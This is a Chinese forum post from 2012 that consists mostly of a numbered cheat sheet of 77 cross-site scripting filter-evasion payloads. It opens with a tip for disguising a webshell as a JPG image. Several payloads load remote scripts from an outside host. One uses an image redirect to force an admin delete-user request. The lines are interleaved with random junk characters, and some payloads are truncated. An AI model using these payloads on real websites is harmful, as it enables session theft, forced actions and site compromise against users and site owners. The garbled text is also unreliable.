跨站图片shell
1 @9 E( ^/ H' K) AXSS跨站代码 <script>alert("")</script>
& }/ b3 ~; ^! U+ e8 y9 |% X5 b
0 X. a2 `' w! @- @" ?' {3 C将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马* L+ `0 [* C# H
2 H* p1 F+ a$ z0 q3 L! I. Q( C0 `
4 X0 O+ F5 P6 q0 |8 L: p
- D1 G5 L+ [# }2 J/ h. [; Z1)普通的XSS JavaScript注入7 {% }+ U/ P7 B3 c& ^9 K! L- q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> Z- N2 p0 Y! {- W0 t f
. ]0 X* k, p% u% g! X& n& F
(2)IMG标签XSS使用JavaScript命令
: k8 T* P. @' Z# S. U- A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- r" [* w. G# `* X$ i/ O1 V/ ?; c, M+ r$ B7 k$ k
(3)IMG标签无分号无引号$ a( O# W/ `7 M8 w( L' Y
<IMG SRC=javascript:alert(‘XSS’)>0 |. j D) z# _
4 C% X( i" n2 V' G, n4 l(4)IMG标签大小写不敏感( W! h% `' {) L( f: ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 d; V5 M" H7 z% `
2 J; e' C( C% u V' I(5)HTML编码(必须有分号)
) Q! m1 E$ {' I; A- A$ S<IMG SRC=javascript:alert(“XSS”)>: b+ T: o- N& |# b' X- n. P
! H9 g0 j) }" F7 d+ |6 s6 s2 h
(6)修正缺陷IMG标签
$ S; [7 E7 @! x2 x. v1 U<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; ~$ r1 _ E8 V: g$ P) Y
0 J1 d: h4 i$ _6 a, c
(7)formCharCode标签(计算器); u% i. D$ q6 i& E6 n, u
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>* v k4 z6 b! Z5 G m6 q( z$ V
8 {2 A9 u$ B4 C5 G! Y(8)UTF-8的Unicode编码(计算器)/ N W0 t& \4 A' s: z( ~ d1 p( h
<IMG SRC=jav..省略..S')>& X1 _& G- U1 S/ _. f
& b# F- L3 c. S4 H! w(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 r( C; m; R! m- }<IMG SRC=jav..省略..S')># z; }# n2 a3 e; e5 Q) p
7 n, J# {1 F- A& L(10)十六进制编码也是没有分号(计算器)
% ?3 z8 t s& y<IMG SRC=java..省略..XSS')>) k. S0 R" U) ~$ ?: f1 A$ R
0 Q: f2 I' P( Z/ {: P
(11)嵌入式标签,将Javascript分开 y' U2 a: O. c S. G* Z1 t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; V& F$ L5 x% A2 A* @7 \, w) m2 R! H+ m3 B- x/ w9 v4 [1 |: G# j! J, r
(12)嵌入式编码标签,将Javascript分开 ^/ I* g, t1 y* R( o7 Z* f/ E
<IMG SRC=”jav ascript:alert(‘XSS’);”>' G- D# L# B1 j
$ i4 N2 J0 N# Z8 A& f8 \" q( s(13)嵌入式换行符
- A, T- g$ U- u# d: e$ C6 e; c8 D<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 j7 N8 z* f9 H, y+ j' Q2 F1 k
9 v/ E1 S" ], h$ j$ v! I# L(14)嵌入式回车
$ D1 V: F# P# e& Y) m* c<IMG SRC=”jav ascript:alert(‘XSS’);”>
% ^( y9 i+ |# O1 o& c9 Z) v" s3 u& j% A5 m5 V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! V$ d, k. H- d8 Z- d/ h<IMG SRC=”javascript:alert(‘XSS‘)”>8 B, T( [) J- c/ g% G Y2 [( a
) o) L; V* B! E5 W8 f, ~* r
(16)解决限制字符(要求同页面)( ~2 A. Y5 i; T* j q4 w+ g& p
<script>z=’document.’</script>
' k" r4 d. P9 _0 c! A<script>z=z+’write(“‘</script>
$ x, O2 \6 d Y<script>z=z+’<script’</script>
, V9 G1 w. f5 p1 H5 I" ^, D! M<script>z=z+’ src=ht’</script>. H/ H7 W' H& e K' G+ V- _
<script>z=z+’tp://ww’</script>
' b9 ^9 [" h- w% W f- Q, `<script>z=z+’w.shell’</script>
5 v( e/ k' J0 P: L<script>z=z+’.net/1.’</script>! ]4 ^$ b9 ^1 `$ R4 f0 r& ?, ?: G
<script>z=z+’js></sc’</script>
8 c* I) v. f7 l8 i- @* m% ~<script>z=z+’ript>”)’</script>0 E5 r# @9 u- h% ]2 F1 J- O
<script>eval_r(z)</script>
" }# P1 t1 g; K* e( \
) x1 i: n, E" b/ E; [7 k0 c(17)空字符* L& R7 `% w0 z5 K" t- j. g
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' M; o! N9 @% v+ v5 G- K+ i! I! v* n* X9 A, ?8 B
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 |0 o9 a* [' v8 vperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 I& E1 c6 j9 e1 |. n2 D. n
. |2 G# E; d$ }0 k) }% J
(19)Spaces和meta前的IMG标签
' R; N6 e, M9 b* J/ D: _/ n<IMG SRC=” javascript:alert(‘XSS’);”>
- o, n2 k" |- @
" b% Y& |) s, z$ L; I& c) T. r4 I( S9 W(20)Non-alpha-non-digit XSS; f; c% x0 ]7 s/ `7 y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># Z# M. N% j* r, f/ ^
1 N: {3 R: n1 [' A$ L# |# x \(21)Non-alpha-non-digit XSS to 2
$ @$ O, P( M6 s6 W( [( s<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, r( n$ \: t$ w1 z" K
1 E5 A( n! ~# b* D(22)Non-alpha-non-digit XSS to 38 N, Q& v" H' ]
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' n x. J, H# F; k+ e6 f( O% a4 j/ t' E
* P/ m& b" C4 E! x `, g5 ]; u% J(23)双开括号
/ K j* `; V) h: A<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 g% r2 T P5 d; S8 G
" ]/ P$ ]6 A( v5 Z(24)无结束脚本标记(仅火狐等浏览器)' B) m) r, S+ @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 b6 T% r/ Q. W) i/ t `% w F; w0 Z
(25)无结束脚本标记2
5 T6 d) p4 M) @<SCRIPT SRC=//3w.org/XSS/xss.js>
i" ]0 _6 P4 P9 }$ S D8 E1 A5 o, ` y$ w$ S- B! u
(26)半开的HTML/JavaScript XSS
, e1 o; z, c; ?9 C6 S6 T" U<IMG SRC=”javascript:alert(‘XSS’)”
2 Z) m: V7 p& z& s6 m7 h( |5 R T, J
4 u: R: t- Y+ v0 i0 b4 x9 c(27)双开角括号
! x2 q3 k' m1 b) v8 }<iframe src=http://3w.org/XSS.html <
+ `" v+ q: _. v2 S8 n' i! M; t! N2 r' x1 r/ e9 V/ u& |9 k5 s: p. S
(28)无单引号 双引号 分号! A' F3 T a( b( H6 a5 F
<SCRIPT>a=/XSS/
2 T1 o. `8 y0 `; ?2 Halert(a.source)</SCRIPT>2 j: }' v, i3 Z* h
6 } P" ?- [3 z' }
(29)换码过滤的JavaScript* i2 A, K R5 c" K0 _6 O4 M7 x
\”;alert(‘XSS’);//
3 ]: p- @+ @4 K# {
9 m2 X7 s1 A0 p, U2 K; ~+ T" T(30)结束Title标签9 S, r% ?2 i* y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 P7 [* W0 U' b5 s& b8 R1 u
+ ]6 y/ Z; o( F(31)Input Image
( \5 N; C- B' N; W- g0 f<INPUT SRC=”javascript:alert(‘XSS’);”>, ?% o5 P" u5 ^0 A) u
/ n* b3 i, X! A& c, d3 P7 |0 C9 @(32)BODY Image
' i+ X/ X) q {( L2 K<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ i8 ?; r$ ^- j+ M: j; N1 M+ G0 H, o8 K* D& D" S6 y
(33)BODY标签
2 X3 t. s/ K+ u5 y# ?4 C# u8 }" p<BODY(‘XSS’)>
/ I) D$ l4 i) P% Z) }: m
% C5 X% @8 N: Q1 w; Q o(34)IMG Dynsrc, l t+ E1 H( {5 J& ?" b/ s& f
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ ]+ z9 D- P0 i' v, s
1 o* J4 R/ A+ X(35)IMG Lowsrc
0 Z: ?# J) ^- u" y1 f) y/ s<IMG LOWSRC=”javascript:alert(‘XSS’)”>
( }3 R4 }$ P. U2 i3 P
; C: X4 R) ?/ U1 G8 N0 l(36)BGSOUND( c c' |" n% A- @' A' E2 Q
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- K2 b/ w; Q4 ]% M3 `: r6 \0 R6 J' L" D' ]. } Z
(37)STYLE sheet
. z. e5 i. Q$ J% q% n- ] B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) H5 V1 W" C( e6 L: S+ a0 R0 M) \3 X; C3 P3 [! A- }
(38)远程样式表9 ~7 e9 W1 y6 i2 M+ j" s# v
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( X w6 J5 u$ M9 t" o
+ r. [3 I9 i, C8 A0 p0 ^, i9 |! Y; q(39)List-style-image(列表式)* Q( @: `9 o. h5 o
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* J1 x% q I. C1 W5 a' \- m4 x; b2 x! J' y" j& }1 K* s
(40)IMG VBscript
- K0 _ R' C+ U( T% ^/ Y<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 b% X; p0 ]2 v$ [# u% }' ~' }6 k1 E) W8 p0 L% c
(41)META链接url( l1 Q- v& H7 B
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 C v' o! I$ X: o" F% Q1 l
; x5 b8 K% H( d. Q
(42)Iframe
! P9 ]9 k3 @# M4 i+ B* ]<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& m% T0 a# w: X(43)Frame
6 }. N4 A3 I" \5 W5 L<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>9 I- H, [0 w$ X5 p5 s; \3 B1 r* C6 N
, D9 ?, p x- ^9 W' a) R' O3 t& e3 M
(44)Table
; I8 {8 o3 x& g! K<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>( }1 l6 x# P5 C
/ u/ ?! B/ u. N' o4 f(45)TD
9 R: ]/ O( V; y4 h<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>- ~- P4 T* P" c% l9 c
/ q8 j& t" ~2 \ L. j) B! l4 _% `(46)DIV background-image
( _) w( R$ v# E<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ e0 a% K) r) r/ J0 K- Y* _8 D7 K
: ~3 C3 e m z- r(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" K! {, H% V6 D7 F9 c5 X3 D" o<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
( z# K4 k! v9 |7 U8 a! D. u2 V: F& U6 J- a! J# f2 C
(48)DIV expression" r. m: w8 z+ T! g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 G/ p# n% T5 U/ C* R& e( a1 m6 [1 b# ?& ?
(49)STYLE属性分拆表达- _7 E% Q6 ~* O( j6 P6 {- Q
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>6 W7 T) `/ A5 F0 Q5 a' t
, j1 t6 }9 w, C- c& P(50)匿名STYLE(组成:开角号和一个字母开头)2 W4 l4 l2 J* z* {% i
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 J, ^: l% a9 n* T1 f
: f$ |1 Y3 S' A% ^. A(51)STYLE background-image
8 T5 x5 N6 H2 h7 r5 G: Q+ U6 R<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! }+ x( D3 _: h+ c
[0 H- `) b$ O: {7 M
(52)IMG STYLE方式
8 c& a$ J' ]8 c8 ]+ Y& S6 e4 Lexppression(alert(“XSS”))’>" f) L0 `; E, ~, I) L) I! r" Y
9 D! \( g! J0 w8 @(53)STYLE background& E- Z6 Y- d& @ l1 M1 E6 o1 _
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ f$ L; B, r9 f7 `
' G* ]1 f1 D$ a' U(54)BASE
7 f( j) ]: o+ l. T1 }<BASE HREF=”javascript:alert(‘XSS’);//”>
( D" z; D0 J$ d* H/ V( j- g5 @+ ~; i& s4 w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS x! F7 C7 L, @) t5 c! T
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
+ Y+ T k7 M& S6 K0 c8 s C3 r6 H C; D
(56)在flash中使用ActionScrpt可以混进你XSS的代码
" _) [5 z; f: M9 o) y/ A) ua=”get”;
3 s" Z( h9 m- Z- j) C; s4 Vb=”URL(\”";' l- g; A% \# n7 n0 _( b
c=”javascript:”;
# x8 @$ F9 C+ b8 W8 t) ? U, Od=”alert(‘XSS’);\”)”;
' x2 K7 k! q' `) d8 seval_r(a+b+c+d);" X( e% g2 x' s1 x! C+ n2 e$ M
- u8 i& \+ c4 l8 f! }& J(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ O$ i' }$ K5 }) \4 B) Y<HTML xmlns:xss>/ I( r/ S7 @, U" M' ^
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 @3 I) q! d- y8 V' M<xss:xss>XSS</xss:xss>
, X: {0 {/ E6 K! R' c</HTML>5 v6 A5 V+ c2 b6 i. b
7 R. j1 K% v$ Z7 _- d0 E* I4 `(58)如果过滤了你的JS你可以在图片里添加JS代码来利用# X& b7 z6 w7 s( s5 p, V0 h0 u# j
<SCRIPT SRC=””></SCRIPT>
) s7 C; ~- w! }9 K+ Q6 b8 U7 F: a0 Z
(59)IMG嵌入式命令,可执行任意命令/ Q5 [9 b5 r, m" G9 G6 Z8 W! S" g8 N
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
3 G) v$ Z; j/ s2 K. Z. V: ~' t R, E0 _+ I! D
(60)IMG嵌入式命令(a.jpg在同服务器), {- o5 d* r9 O- A: V
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& N1 e, o* x# j
6 x8 B: [" j w: {. h- U2 ?' t(61)绕符号过滤
" L% Z1 N0 r _& a<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) v5 O4 Q8 i& c
d' o. ?* y, c0 y" m(62)' q" J O7 o1 L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 E9 L* y' f4 ^ f( F9 f$ _) S8 j$ r# i) {1 M
(63)
. w3 }1 k0 b0 N9 ^8 A( J6 V0 o<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>$ s; N$ n4 y9 Q9 R0 E4 R7 v* q
0 n6 `6 ?4 H- S8 g7 m' L(64)6 q; F1 L' ]; r( [* y v
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>! u1 H2 G! g" {7 i8 K) h6 j
, U- \: R7 j6 k6 R4 ]: P
(65)
4 s0 Q# X! R' z! O$ g* \<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 M9 b8 B; d- W) f
# O6 @( i8 H, O9 x/ i% m) Z; m(66)
4 Q' q. z0 ?# V) D<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 T7 i" l. |1 p' \
3 {. i8 U# i; a. d, \- }- J, o(67)
+ C+ ?1 {) p( s<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>; H4 w1 U2 b0 z) {
+ D- }: [$ y# K8 F! T: T(68)URL绕行 Z8 b6 F0 z% x5 }/ p
<A HREF=”http://127.0.0.1/”>XSS</A>, h3 q1 B( Y' }
1 Y8 z! N& V; L: T$ L* h(69)URL编码! `, V; P. J0 D
<A HREF=”http://3w.org”>XSS</A>
& C/ Y! r* V6 M1 ?' Q+ N% A. E# u7 y" Q: b" E$ [; ]/ _- L
(70)IP十进制7 p2 m7 u+ j/ ^/ W) Z& v
<A HREF=”http://3232235521″>XSS</A>% S, @9 V" f6 h% k8 ^9 }0 h
! A) ^7 x$ f9 Q% n
(71)IP十六进制/ U6 N/ Z: U4 x- q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
1 @4 @+ B" u: g
9 D+ I; R: j# q) J7 G(72)IP八进制2 ?+ J9 K% c5 n6 N" w/ M2 k1 H
<A HREF=”http://0300.0250.0000.0001″>XSS</A>3 B# o7 Q3 M' w$ C' ?
: \9 C2 E/ m. M5 G4 l
(73)混合编码
}$ K( p% n# |# ]<A HREF=”h2 }8 r s f$ u$ N6 l2 w1 J
tt p://6 6.000146.0×7.147/”">XSS</A>
, X# n* I- u! N; F6 \: c
- a% M& g1 x8 a4 }. \(74)节省[http:]& L. G! f1 n1 `* r9 N
<A HREF=”//www.google.com/”>XSS</A>* K, Q' B3 i& R( Q2 _. P& E( {8 p
( E) K$ A: g: M- H2 G(75)节省[www]# {" z9 |( M% N6 y; V* x
<A HREF=”http://google.com/”>XSS</A>
8 k; h9 f% A6 F( h7 ?9 ?& j5 A# u& ]* U6 @
(76)绝对点绝对DNS
, {: b t* V3 P$ U<A HREF=”http://www.google.com./”>XSS</A>; L& H h4 ^& }: X- S
* X3 E- S' O4 K! H) k6 \( N
(77)javascript链接
9 g2 |# z# y0 U* Z<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
) s/ Z; p) }- y c' [" y |
发表于 2012-9-13 17:04:56
收藏
支持
反对